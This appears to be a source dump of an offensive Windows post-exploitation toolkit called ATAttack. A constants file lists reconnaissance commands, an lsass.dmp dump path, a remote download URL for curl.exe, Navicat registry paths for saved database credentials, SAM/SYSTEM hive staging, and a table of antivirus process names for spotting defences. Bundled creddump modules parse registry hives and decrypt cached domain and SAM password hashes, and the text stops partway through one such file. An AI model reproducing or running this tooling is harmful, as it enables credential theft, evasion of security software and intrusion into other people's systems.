3 | import tempfile
4 | import random
5 | import string
6 | import time
7 | import os
8 | import getpass
9 |
10 |
11 | tmp = tempfile.gettempdir()
12 | date = time.strftime("%d%m%Y_%H%M%S") + ".tmp"
13 |
14 | class constant():
15 | # pyurl = "https://www.yunzhijia.com/microblog/filesvr/5e89bca6b54c8d14ea9061a7/nnn.exe"
16 | curl_url = 'https://www.yunzhijia.com/microblog/filesvr/5e89d52aa37259795a86e7e4/curl.exe'
17 | # pyexe = "wpsd.exe"
18 | # pyname = "mimi.json"
19 | upload_dir = tempfile.gettempdir() + os.sep + date
20 | dump_name = upload_dir + os.sep + "lsass.dmp"
21 | cmdlist = [
22 | r'reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"',
23 | 'rout print',
24 | 'net session',
25 | 'arp -a',
26 | r'type C:\windows\system32\drivers\etc\hosts',
27 | 'ipconfig /all',
28 | 'netstat -na',
29 | 'wevtutil qe security /rd:true /f:text /q:"Event[System[(EventID=4624 or EventID=4625) and TimeCreated[timediff(@SystemTime) <= 4449183132]]]"']
30 | drive = 'C'
31 | user = getpass.getuser()
32 | temp_ = str((random.randrange(100,500,3)))
33 | tmp_name = upload_dir + os.sep + "update.log"
34 | tmp_name_ = upload_dir + os.sep + "drive.txt"
35 | tmp_name__ = upload_dir + os.sep + "host.txt"
36 | file_name_results = 'credentials_{current_time}'.format(
37 | current_time=date
38 | ) # The extension is added depending on the user output choice
39 | regs = {
40 | 'MySQL Server' : 'Software\\PremiumSoft\\Navicat\\Servers',
41 | 'MariaDB Server' : 'Software\\PremiumSoft\\NavicatMARIADB\\Servers',
42 | 'MongoDB Server' : 'Software\\PremiumSoft\\NavicatMONGODB\\Servers',
43 | 'MSSQL Server' : 'Software\\PremiumSoft\\NavicatMSSQL\\Servers',
44 | 'OracleSQL Server' : 'Software\\PremiumSoft\\NavicatOra\\Servers',
45 | 'PostgreSQL Server' : 'Software\\PremiumSoft\\NavicatPG\\Servers',
46 | 'SQLite Server' : 'Software\\PremiumSoft\\NavicatSQLite\\Servers'
47 | }
48 | profile = {
49 | 'APPDATA': drive + ":\\Users\\" + user + "\\AppData\\Roaming\\",
50 | 'USERPROFILE': u'{drive}:\\Users\\{user}\\',
51 | 'HOMEDRIVE': u'{drive}:',
52 | 'HOMEPATH': u'{drive}:\\Users\\{user}',
53 | 'ALLUSERSPROFILE': drive + ":\\ProgramData",
54 | 'COMPOSER_HOME': u'{drive}:\\Users\\{user}\\AppData\\Roaming\\Composer\\',
55 | 'LOCALAPPDATA': drive + ":\\Users\\" + user + "\\AppData\\Local\\",
56 | }
57 | system_dpapi = None
58 | username = "administrator"
59 | lmhash = "aad3b435b51404eeaad3b435b51404ee:{}"
60 | keepass = {}
61 | hives = {
62 | 'system': os.path.join(
63 | tempfile.gettempdir(),
64 | ''.join([random.choice(string.ascii_lowercase) for x in range(0, random.randint(6, 12))])),
65 | 'sam': os.path.join(
66 | tempfile.gettempdir(),
67 | ''.join([random.choice(string.ascii_lowercase) for x in range(0, random.randint(6, 12))])),
68 | # 'security': os.path.join(
69 | # tmp,
70 | # ''.join([random.choice(string.ascii_lowercase) for x in range(0, random.randint(6, 12))])),
71 | }
72 | av_json = {
73 | "360tray.exe": "360安全卫士-实时保护",
74 | "360safe.exe": "360安全卫士-主程序",
75 | "ZhuDongFangYu.exe": "360安全卫士-主动防御",
76 | "360sd.exe": "360杀毒",
77 | "a2guard.exe": "a-squared杀毒",
78 | "ad-watch.exe": "Lavasoft杀毒",
79 | "cleaner8.exe": "The Cleaner杀毒",
80 | "vba32lder.exe": "vb32杀毒",
81 | "MongoosaGUI.exe": "Mongoosa杀毒",
82 | "CorantiControlCenter32.exe": "Coranti2012杀毒",
83 | "F-PROT.exe": "F-Prot AntiVirus",
84 | "CMCTrayIcon.exe": "CMC杀毒",
85 | "K7TSecurity.exe": "K7杀毒",
86 | "UnThreat.exe": "UnThreat杀毒",
87 | "CKSoftShiedAntivirus4.exe": "Shield Antivirus杀毒",
88 | "AVWatchService.exe": "VIRUSfighter杀毒",
89 | "ArcaTasksService.exe": "ArcaVir杀毒",
90 | "iptray.exe": "Immunet杀毒",
91 | "PSafeSysTray.exe": "PSafe杀毒",
92 | "nspupsvc.exe": "nProtect杀毒",
93 | "SpywareTerminatorShield.exe": "SpywareTerminator杀毒",
94 | "BKavService.exe": "Bkav杀毒",
95 | "MsMpEng.exe": "Microsoft Security Essentials",
96 | "SBAMSvc.exe": "VIPRE",
97 | "ccSvcHst.exe": "Norton杀毒",
98 | "f-secure.exe": "冰岛",
99 | "avp.exe": "Kaspersky",
100 | "KvMonXP.exe": "江民杀毒",
101 | "RavMonD.exe": "瑞星杀毒",
102 | "Mcshield.exe": "Mcafee",
103 | "Tbmon.exe": "Mcafee",
104 | "Frameworkservice.exe": "Mcafee",
105 | "egui.exe": "ESET NOD32",
106 | "ekrn.exe": "ESET NOD32",
107 | "eguiProxy.exe": "ESET NOD32",
108 | "kxetray.exe": "金山毒霸",
109 | "knsdtray.exe": "可牛杀毒",
110 | "TMBMSRV.exe": "趋势杀毒",
111 | "avcenter.exe": "Avira(小红伞)",
112 | "avguard.exe": "Avira(小红伞)",
113 | "avgnt.exe": "Avira(小红伞)",
114 | "sched.exe": "Avira(小红伞)",
115 | "ashDisp.exe": "Avast网络安全",
116 | "rtvscan.exe": "诺顿杀毒",
117 | "ccapp.exe": "Symantec Norton",
118 | "NPFMntor.exe": "Norton杀毒软件相关进程",
119 | "ccSetMgr.exe": "赛门铁克",
120 | "ccRegVfy.exe": "Norton杀毒软件自身完整性检查程序",
121 | "vptray.exe": "Norton病毒防火墙-盾牌图标程序",
122 | "ksafe.exe": "金山卫士",
123 | "QQPCRTP.exe": "QQ电脑管家",
124 | "Miner.exe": "流量矿石",
125 | "AYAgent.exe": "韩国胶囊",
126 | "patray.exe": "安博士",
127 | "V3Svc.exe": "安博士V3",
128 | "avgwdsvc.exe": "AVG杀毒",
129 | "QUHLPSVC.exe": "QUICK HEAL杀毒",
130 | "mssecess.exe": "微软杀毒",
131 | "SavProgress.exe": "Sophos杀毒",
132 | "fsavgui.exe": "F-Secure杀毒",
133 | "vsserv.exe": "比特梵德",
134 | "remupd.exe": "熊猫卫士",
135 | "FortiTray.exe": "飞塔",
136 | "safedog.exe": "安全狗",
137 | "parmor.exe": "木马克星",
138 | "Iparmor.exe.exe": "木马克星",
139 | "beikesan.exe": "贝壳云安全",
140 | "KSWebShield.exe": "金山网盾",
141 | "TrojanHunter.exe": "木马猎手",
142 | "GG.exe": "巨盾网游安全盾",
143 | "adam.exe": "绿鹰安全精灵",
144 | "AST.exe": "超级巡警",
145 | "ananwidget.exe": "墨者安全专家",
146 | "AVK.exe": "GData",
147 | "avg.exe": "AVG Anti-Virus",
148 | "spidernt.exe": "Dr.web",
149 | "avgaurd.exe": "Avira Antivir",
150 | "vsmon.exe": "ZoneAlarm",
151 | "cpf.exe": "Comodo",
152 | "outpost.exe": "Outpost Firewall",
153 | "rfwmain.exe": "瑞星防火墙",
154 | "kpfwtray.exe": "金山网镖",
155 | "FYFireWall.exe": "风云防火墙",
156 | "MPMon.exe": "微点主动防御",
157 | "pfw.exe": "天网防火墙",
158 | "S.exe": "在抓鸡",
159 | "1433.exe": "在扫1433",
160 | "DUB.exe": "在爆破",
161 | "ServUDaemon.exe": "发现S-U",
162 | "BaiduSdSvc.exe": "百度杀毒-服务进程",
163 | "BaiduSdTray.exe": "百度杀毒-托盘进程",
164 | "BaiduSd.exe": "百度杀毒-主程序",
165 | "SafeDogGuardCenter.exe": "安全狗",
166 | "safedogupdatecenter.exe": "安全狗",
167 | "safedogguardcenter.exe": "安全狗",
168 | "SafeDogSiteIIS.exe": "安全狗",
169 | "SafeDogTray.exe": "安全狗",
170 | "SafeDogServerUI.exe": "安全狗",
171 | "D_Safe_Manage.exe": "D盾",
172 | "d_manage.exe": "D盾",
173 | "yunsuo_agent_service.exe": "云锁",
174 | "yunsuo_agent_daemon.exe": "云锁",
175 | "HwsPanel.exe": "护卫神",
176 | "hws_ui.exe": "护卫神",
177 | "hws.exe": "护卫神",
178 | "hwsd.exe": "护卫神",
179 | "hipstray.exe": "火绒",
180 | "wsctrl.exe": "火绒",
181 | "usysdiag.exe": "火绒",
182 | "WEBSCANX.EXE": "网络病毒克星",
183 | "SPHINX.EXE": "SPHINX防火墙",
184 | "bddownloader.exe": "百度卫士",
185 | "baiduansvx.exe": "百度卫士-主进程",
186 | "AvastUI.exe": "Avast!5主程序",
187 |
188 | }
189 |
190 |
191 |
--------------------------------------------------------------------------------
/ATAttack/framework/newobj.py:
--------------------------------------------------------------------------------
1 | # This file is part of creddump.
2 | #
3 | # creddump is free software: you can redistribute it and/or modify
4 | # it under the terms of the GNU General Public License as published by
5 | # the Free Software Foundation, either version 3 of the License, or
6 | # (at your option) any later version.
7 | #
8 | # creddump is distributed in the hope that it will be useful,
9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
11 | # GNU General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with creddump. If not, see .
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
22 | from ATAttack.framework.object import *
23 | from ATAttack.framework.types import regtypes as types
24 | from operator import itemgetter
25 | from struct import unpack
26 |
27 | def get_ptr_type(structure, member):
28 | """Return the type a pointer points to.
29 |
30 | Arguments:
31 | structure : the name of the structure from vtypes
32 | member : a list of members
33 |
34 | Example:
35 | get_ptr_type('_EPROCESS', ['ActiveProcessLinks', 'Flink']) => ['_LIST_ENTRY']
36 | """
37 | if len(member) > 1:
38 | _, tp = get_obj_offset(types, [structure, member[0]])
39 | if tp == 'array':
40 | return types[structure][1][member[0]][1][2][1]
41 | else:
42 | return get_ptr_type(tp, member[1:])
43 | else:
44 | return types[structure][1][member[0]][1][1]
45 |
46 | class Obj(object):
47 | """Base class for all objects.
48 |
49 | May return a subclass for certain data types to allow
50 | for special handling.
51 | """
52 |
53 | def __new__(typ, name, address, space):
54 | if name in globals():
55 | # This is a bit of "magic"
56 | # Could be replaced with a dict mapping type names to types
57 | return globals()[name](name,address,space)
58 | elif name in builtin_types:
59 | return Primitive(name, address, space)
60 | else:
61 | obj = object.__new__(typ)
62 | return obj
63 |
64 | def __init__(self, name, address, space):
65 | self.name = name
66 | self.address = address
67 | self.space = space
68 |
69 | # Subclasses can add fields to this list if they want them
70 | # to show up in values() or members(), even if they do not
71 | # appear in the vtype definition
72 | self.extra_members = []
73 |
74 | def __getattribute__(self, attr):
75 | try:
76 | return object.__getattribute__(self, attr)
77 | except AttributeError:
78 | pass
79 |
80 | if self.name in builtin_types:
81 | raise AttributeError("Primitive types have no dynamic attributes")
82 |
83 | try:
84 | off, tp = get_obj_offset(types, [self.name, attr])
85 | except:
86 | raise AttributeError("'%s' has no attribute '%s'" % (self.name, attr))
87 |
88 | if tp == 'array':
89 | a_len = types[self.name][1][attr][1][1]
90 | l = []
91 | for i in range(a_len):
92 | a_off, a_tp = get_obj_offset(types, [self.name, attr, i])
93 | if a_tp == 'pointer':
94 | ptp = get_ptr_type(self.name, [attr, i])
95 | l.append(Pointer(a_tp, self.address+a_off, self.space, ptp))
96 | else:
97 | l.append(Obj(a_tp, self.address+a_off, self.space))
98 | return l
99 | elif tp == 'pointer':
100 | # Can't just return a Obj here, since pointers need to also
101 | # know what type they point to.
102 | ptp = get_ptr_type(self.name, [attr])
103 | return Pointer(tp, self.address+off, self.space, ptp)
104 | else:
105 | return Obj(tp, self.address+off, self.space)
106 |
107 | def __div__(self, other):
108 | if isinstance(other,tuple) or isinstance(other,list):
109 | return Pointer(other[0], self.address, self.space, other[1])
110 | elif isinstance(other,str):
111 | return Obj(other, self.address, self.space)
112 | else:
113 | raise ValueError("Must provide a type name as string for casting")
114 |
115 | def members(self):
116 | """Return a list of this object's members, sorted by offset."""
117 |
118 | # Could also just return the list
119 | membs = [ (k, v[0]) for k,v in types[self.name][1].items()]
120 | membs.sort(key=itemgetter(1))
121 | return map(itemgetter(0),membs) + self.extra_members
122 |
123 | def values(self):
124 | """Return a dictionary of this object's members and their values"""
125 |
126 | valdict = {}
127 | for k in self.members():
128 | valdict[k] = getattr(self, k)
129 | return valdict
130 |
131 | def bytes(self, length=-1):
132 | """Get bytes starting at the address of this object.
133 |
134 | Arguments:
135 | length : the number of bytes to read. Default: size of
136 | this object.
137 | """
138 |
139 | if length == -1:
140 | length = self.size()
141 | return self.space.read(self.address, length)
142 |
143 | def size(self):
144 | """Get the size of this object."""
145 |
146 | if self.name in builtin_types:
147 | return builtin_types[self.name][0]
148 | else:
149 | return types[self.name][0]
150 |
151 | def __repr__(self):
152 | return "<%s @%08x>" % (self.name, self.address)
153 |
154 | def __eq__(self, other):
155 | if not isinstance(other, Obj):
156 | raise TypeError("Types are incomparable")
157 | return self.address == other.address and self.name == other.name
158 |
159 | def __ne__(self, other):
160 | return not self.__eq__(other)
161 |
162 | def __hash__(self):
163 | return hash(self.address) ^ hash(self.name)
164 |
165 | def is_valid(self):
166 | return self.space.is_valid_address(self.address)
167 |
168 | def get_offset(self, member):
169 | return get_obj_offset(types, [self.name] + member)
170 |
171 | class Primitive(Obj):
172 | """Class to represent a primitive data type.
173 |
174 | Attributes:
175 | value : the python primitive value of this type
176 | """
177 |
178 | def __new__(typ, *args, **kwargs):
179 | obj = object.__new__(typ)
180 | return obj
181 |
182 | def __init__(self, name, address, space):
183 | super(Primitive,self).__init__(name, address, space)
184 | length, fmt = builtin_types[name]
185 | data = space.read(address,length)
186 | if not data: self.value = None
187 | else: self.value = unpack(fmt,data)[0]
188 |
189 | def __repr__(self):
190 | return repr(self.value)
191 |
192 | def members(self):
193 | return []
194 |
195 | class Pointer(Obj):
196 | """Class to represent pointers.
197 |
198 | value : the object pointed to
199 |
200 | If an attribute is not found in this instance,
201 | the attribute will be looked up in the referenced
202 | object."""
203 |
204 | def __new__(typ, *args, **kwargs):
205 | obj = object.__new__(typ)
206 | return obj
207 |
208 | def __init__(self, name, address, space, ptr_type):
209 | super(Pointer,self).__init__(name, address, space)
210 | ptr_address = read_value(space, name, address)
211 | if ptr_type[0] == 'pointer':
212 | self.value = Pointer(ptr_type[0], ptr_address, self.space, ptr_type[1])
213 | else:
214 | self.value = Obj(ptr_type[0], ptr_address, self.space)
215 |
216 | def __getattribute__(self, attr):
217 | # It's still nice to be able to access things through pointers
218 | # without having to explicitly dereference them, so if we don't
219 | # find an attribute via our superclass, just dereference the pointer
220 | # and return the attribute in the pointed-to type.
221 | try:
222 | return super(Pointer,self).__getattribute__(attr)
223 | except AttributeError:
224 | return getattr(self.value, attr)
225 |
226 | def __repr__(self):
227 | return "" % (self.value.name, self.value.address)
228 |
229 | def members(self):
230 | return self.value.members()
231 |
232 | class _UNICODE_STRING(Obj):
233 | """Class representing a _UNICODE_STRING
234 |
235 | Adds the following behavior:
236 | * The Buffer attribute is presented as a Python string rather
237 | than a pointer to an unsigned short.
238 | * The __str__ method returns the value of the Buffer.
239 | """
240 |
241 | def __new__(typ, *args, **kwargs):
242 | obj = object.__new__(typ)
243 | return obj
244 |
245 | def __str__(self):
246 | return self.Buffer
247 |
248 | # Custom Attributes
249 | def getBuffer(self):
250 | return read_unicode_string(self.space, types, [], self.address)
251 | Buffer = property(fget=getBuffer)
252 |
253 | class _CM_KEY_NODE(Obj):
254 | def __new__(typ, *args, **kwargs):
255 | obj = object.__new__(typ)
256 | return obj
257 |
258 | def getName(self):
259 | return read_string(self.space, types, ['_CM_KEY_NODE', 'Name'],
260 | self.address, self.NameLength.value)
261 | Name = property(fget=getName)
262 |
263 | class _CM_KEY_VALUE(Obj):
264 | def __new__(typ, *args, **kwargs):
265 | obj = object.__new__(typ)
266 | return obj
267 |
268 | def getName(self):
269 | return read_string(self.space, types, ['_CM_KEY_VALUE', 'Name'],
270 | self.address, self.NameLength.value)
271 | Name = property(fget=getName)
272 |
273 | class _CHILD_LIST(Obj):
274 | def __new__(typ, *args, **kwargs):
275 | obj = object.__new__(typ)
276 | return obj
277 |
278 | def getList(self):
279 | lst = []
280 | list_address = read_obj(self.space, types,
281 | ['_CHILD_LIST', 'List'], self.address)
282 | for i in range(self.Count.value):
283 | lst.append(Pointer("pointer", list_address+(i*4), self.space,
284 | ["_CM_KEY_VALUE"]))
285 | return lst
286 | List = property(fget=getList)
287 |
288 | class _CM_KEY_INDEX(Obj):
289 | def __new__(typ, *args, **kwargs):
290 | obj = object.__new__(typ)
291 | return obj
292 |
293 | def getList(self):
294 | lst = []
295 | for i in range(self.Count.value):
296 | # we are ignoring the hash value here
297 | off,tp = get_obj_offset(types, ['_CM_KEY_INDEX', 'List', i*2])
298 | lst.append(Pointer("pointer", self.address+off, self.space,
299 | ["_CM_KEY_NODE"]))
300 | return lst
301 | List = property(fget=getList)
302 |
--------------------------------------------------------------------------------
/ATAttack/framework/object.py:
--------------------------------------------------------------------------------
1 | # Volatools Basic
2 | # Copyright (C) 2007 Komoku, Inc.
3 | #
4 | # This program is free software; you can redistribute it and/or modify
5 | # it under the terms of the GNU General Public License as published by
6 | # the Free Software Foundation; either version 2 of the License, or (at
7 | # your option) any later version.
8 | #
9 | # This program is distributed in the hope that it will be useful, but
10 | # WITHOUT ANY WARRANTY; without even the implied warranty of
11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
12 | # General Public License for more details.
13 | #
14 | # You should have received a copy of the GNU General Public License
15 | # along with this program; if not, write to the Free Software
16 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
17 | #
18 |
19 | """
20 | @author: AAron Walters and Nick Petroni
21 | @license: GNU General Public License 2.0 or later
22 | @contact: awalters@komoku.com, npetroni@komoku.com
23 | @organization: Komoku, Inc.
24 | """
25 |
26 | import struct
27 |
28 | builtin_types = { \
29 | 'int' : (4, 'i'), \
30 | 'long': (4, 'i'), \
31 | 'unsigned long' : (4, 'I'), \
32 | 'unsigned int' : (4, 'I'), \
33 | 'address' : (4, 'I'), \
34 | 'char' : (1, 'c'), \
35 | 'unsigned char' : (1, 'B'), \
36 | 'unsigned short' : (2, 'H'), \
37 | 'short' : (2, 'h'), \
38 | 'long long' : (8, 'q'), \
39 | 'unsigned long long' : (8, 'Q'), \
40 | 'pointer' : (4, 'I'),\
41 | }
42 |
43 |
44 | def obj_size(types, objname):
45 | if not types.has_key(objname):
46 | raise Exception('Invalid type %s not in types' % (objname))
47 |
48 | return types[objname][0]
49 |
50 | def builtin_size(builtin):
51 | if not builtin_types.has_key(builtin):
52 | raise Exception('Invalid built-in type %s' % (builtin))
53 |
54 | return builtin_types[builtin][0]
55 |
56 | def read_value(addr_space, value_type, vaddr):
57 | """
58 | Read the low-level value for a built-in type.
59 | """
60 |
61 | if not builtin_types.has_key(value_type):
62 | raise Exception('Invalid built-in type %s' % (value_type))
63 |
64 | type_unpack_char = builtin_types[value_type][1]
65 | type_size = builtin_types[value_type][0]
66 |
67 | buf = addr_space.read(vaddr, type_size)
68 | if buf is None:
69 | return None
70 | (val, ) = struct.unpack(type_unpack_char, buf)
71 |
72 | return val
73 |
74 | def read_unicode_string(addr_space, types, member_list, vaddr):
75 | offset = 0
76 | if len(member_list) > 1:
77 | (offset, current_type) = get_obj_offset(types, member_list)
78 |
79 |
80 | buf = read_obj(addr_space, types, ['_UNICODE_STRING', 'Buffer'], vaddr + offset)
81 | length = read_obj(addr_space, types, ['_UNICODE_STRING', 'Length'], vaddr + offset)
82 |
83 | if length == 0x0:
84 | return ""
85 |
86 | if buf is None or length is None:
87 | return None
88 |
89 | readBuf = read_string(addr_space, types, ['char'], buf, length)
90 |
91 | if readBuf is None:
92 | return None
93 |
94 | try:
95 | readBuf = readBuf.decode('UTF-16').encode('ascii')
96 | except:
97 | return None
98 |
99 | return readBuf
100 |
101 | def read_string(addr_space, types, member_list, vaddr, max_length=256):
102 | offset = 0
103 | if len(member_list) > 1:
104 | (offset, current_type) = get_obj_offset(types, member_list)
105 |
106 | val = addr_space.read(vaddr + offset, max_length)
107 |
108 | return val
109 |
110 |
111 | def read_null_string(addr_space, types, member_list, vaddr, max_length=256):
112 | string = read_string(addr_space, types, member_list, vaddr, max_length)
113 |
114 | if string is None:
115 | return None
116 |
117 | if (string.find('\0') == -1):
118 | return string
119 | (string, none) = string.split('\0', 1)
120 | return string
121 |
122 |
123 | def get_obj_offset(types, member_list):
124 | """
125 | Returns the (offset, type) pair for a given list
126 | """
127 | member_list.reverse()
128 |
129 | current_type = member_list.pop()
130 |
131 | offset = 0
132 |
133 | while (len(member_list) > 0):
134 | if current_type == 'array':
135 | current_type = member_dict[current_member][1][2][0]
136 | if current_type in builtin_types:
137 | current_type_size = builtin_size(current_type)
138 | else:
139 | current_type_size = obj_size(types, current_type)
140 | index = member_list.pop()
141 | offset += index * current_type_size
142 | continue
143 |
144 | elif not types.has_key(current_type):
145 | raise Exception('Invalid type ' + current_type)
146 |
147 | member_dict = types[current_type][1]
148 |
149 | current_member = member_list.pop()
150 | if not member_dict.has_key(current_member):
151 | raise Exception('Invalid member %s in type %s' % (current_member, current_type))
152 |
153 | offset += member_dict[current_member][0]
154 |
155 | current_type = member_dict[current_member][1][0]
156 |
157 | return (offset, current_type)
158 |
159 |
160 | def read_obj(addr_space, types, member_list, vaddr):
161 | """
162 | Read the low-level value for some complex type's member.
163 | The type must have members.
164 | """
165 | if len(member_list) < 2:
166 | raise Exception('Invalid type/member ' + str(member_list))
167 |
168 |
169 |
170 | (offset, current_type) = get_obj_offset(types, member_list)
171 | return read_value(addr_space, current_type, vaddr + offset)
172 |
--------------------------------------------------------------------------------
/ATAttack/framework/prints.py:
--------------------------------------------------------------------------------
1 | from __future__ import print_function
2 | from colorama import init, Fore
3 | import random
4 | import string
5 |
6 | init(convert=True)
7 |
8 |
9 | class Constant:
10 | output = []
11 |
12 |
13 | def reset_output():
14 | Constant.output = []
15 |
16 |
17 | def table_success(id, message):
18 | print(Fore.GREEN + " " + id + Fore.RESET + message)
19 | Constant.output.append(("ok", id + message))
20 |
21 |
22 | def table_error(id, message):
23 | print(Fore.RED + " " + id + Fore.RESET + message)
24 | Constant.output.append(("error", id + message))
25 |
26 |
27 | def print_success(message):
28 | print(Fore.GREEN + " [+] " + Fore.RESET + message)
29 | Constant.output.append(("ok", message))
30 |
31 |
32 | def print_error(message):
33 | print(Fore.RED + " [-] " + Fore.RESET + message)
34 | Constant.output.append(("error", message))
35 |
36 |
37 | def print_info(message):
38 | print(Fore.CYAN + " [!] " + Fore.RESET + message)
39 | Constant.output.append(("info", message))
40 |
41 |
42 | def print_warning(message):
43 | print(Fore.YELLOW + " [!] " + Fore.RESET + message)
44 | Constant.output.append(("warning", message))
45 |
46 | def s_rangdom():
47 | return ''.join(random.sample(string.ascii_letters + string.digits,8))
48 |
--------------------------------------------------------------------------------
/ATAttack/framework/types.py:
--------------------------------------------------------------------------------
1 | # This file is part of creddump.
2 | #
3 | # creddump is free software: you can redistribute it and/or modify
4 | # it under the terms of the GNU General Public License as published by
5 | # the Free Software Foundation, either version 3 of the License, or
6 | # (at your option) any later version.
7 | #
8 | # creddump is distributed in the hope that it will be useful,
9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
11 | # GNU General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with creddump. If not, see .
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
22 | regtypes = {
23 | '_CM_KEY_VALUE' : [ 0x18, {
24 | 'Signature' : [ 0x0, ['unsigned short']],
25 | 'NameLength' : [ 0x2, ['unsigned short']],
26 | 'DataLength' : [ 0x4, ['unsigned long']],
27 | 'Data' : [ 0x8, ['unsigned long']],
28 | 'Type' : [ 0xc, ['unsigned long']],
29 | 'Flags' : [ 0x10, ['unsigned short']],
30 | 'Spare' : [ 0x12, ['unsigned short']],
31 | 'Name' : [ 0x14, ['array', 1, ['unsigned short']]],
32 | } ],
33 | '_CM_KEY_NODE' : [ 0x50, {
34 | 'Signature' : [ 0x0, ['unsigned short']],
35 | 'Flags' : [ 0x2, ['unsigned short']],
36 | 'LastWriteTime' : [ 0x4, ['_LARGE_INTEGER']],
37 | 'Spare' : [ 0xc, ['unsigned long']],
38 | 'Parent' : [ 0x10, ['unsigned long']],
39 | 'SubKeyCounts' : [ 0x14, ['array', 2, ['unsigned long']]],
40 | 'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]],
41 | 'ValueList' : [ 0x24, ['_CHILD_LIST']],
42 | 'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']],
43 | 'Security' : [ 0x2c, ['unsigned long']],
44 | 'Class' : [ 0x30, ['unsigned long']],
45 | 'MaxNameLen' : [ 0x34, ['unsigned long']],
46 | 'MaxClassLen' : [ 0x38, ['unsigned long']],
47 | 'MaxValueNameLen' : [ 0x3c, ['unsigned long']],
48 | 'MaxValueDataLen' : [ 0x40, ['unsigned long']],
49 | 'WorkVar' : [ 0x44, ['unsigned long']],
50 | 'NameLength' : [ 0x48, ['unsigned short']],
51 | 'ClassLength' : [ 0x4a, ['unsigned short']],
52 | 'Name' : [ 0x4c, ['array', 1, ['unsigned short']]],
53 | } ],
54 | '_CM_KEY_INDEX' : [ 0x8, {
55 | 'Signature' : [ 0x0, ['unsigned short']],
56 | 'Count' : [ 0x2, ['unsigned short']],
57 | 'List' : [ 0x4, ['array', 1, ['unsigned long']]],
58 | } ],
59 | '_CHILD_LIST' : [ 0x8, {
60 | 'Count' : [ 0x0, ['unsigned long']],
61 | 'List' : [ 0x4, ['unsigned long']],
62 | } ],
63 | }
64 |
--------------------------------------------------------------------------------
/ATAttack/framework/win32/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c1y2m3/ATAttack/b3df31d57061900246ab68ba240b26a42a02002c/ATAttack/framework/win32/__init__.py
--------------------------------------------------------------------------------
/ATAttack/framework/win32/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c1y2m3/ATAttack/b3df31d57061900246ab68ba240b26a42a02002c/ATAttack/framework/win32/__init__.pyc
--------------------------------------------------------------------------------
/ATAttack/framework/win32/domcachedump.py:
--------------------------------------------------------------------------------
1 | # This file is part of creddump.
2 | #
3 | # creddump is free software: you can redistribute it and/or modify
4 | # it under the terms of the GNU General Public License as published by
5 | # the Free Software Foundation, either version 3 of the License, or
6 | # (at your option) any later version.
7 | #
8 | # creddump is distributed in the hope that it will be useful,
9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
11 | # GNU General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with creddump. If not, see .
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
22 | from framework.win32.rawreg import *
23 | from framework.addrspace import HiveFileAddressSpace
24 | from framework.win32.hashdump import get_bootkey
25 | from framework.win32.lsasecrets import get_secret_by_name,get_lsa_key
26 | from Crypto.Hash import HMAC
27 | from Crypto.Cipher import ARC4
28 | from struct import unpack
29 |
30 | def get_nlkm(secaddr, lsakey):
31 | return get_secret_by_name(secaddr, 'NL$KM', lsakey)
32 |
33 | def decrypt_hash(edata, nlkm, ch):
34 | hmac_md5 = HMAC.new(nlkm,ch)
35 | rc4key = hmac_md5.digest()
36 |
37 | rc4 = ARC4.new(rc4key)
38 | data = rc4.encrypt(edata)
39 | return data
40 |
41 | def parse_cache_entry(cache_data):
42 | (uname_len, domain_len) = unpack(".
15 |
16 | """
17 | @author: Brendan Dolan-Gavitt
18 | @license: GNU General Public License 2.0 or later
19 | @contact: bdolangavitt@wesleyan.edu
20 | """
21 |
22 | from ATAttack.framework.win32.rawreg import *
23 | from ATAttack.framework.addrspace import HiveFileAddressSpace
24 | from Crypto.Hash import MD5
25 | from Crypto.Cipher import ARC4,DES
26 | from struct import unpack,pack
27 |
28 | odd_parity = [
29 | 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
30 | 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
31 | 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
32 | 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
33 | 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
34 | 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
35 | 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
36 | 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
37 | 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
38 | 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
39 | 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
40 | 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
41 | 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
42 | 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
43 | 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
44 | 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
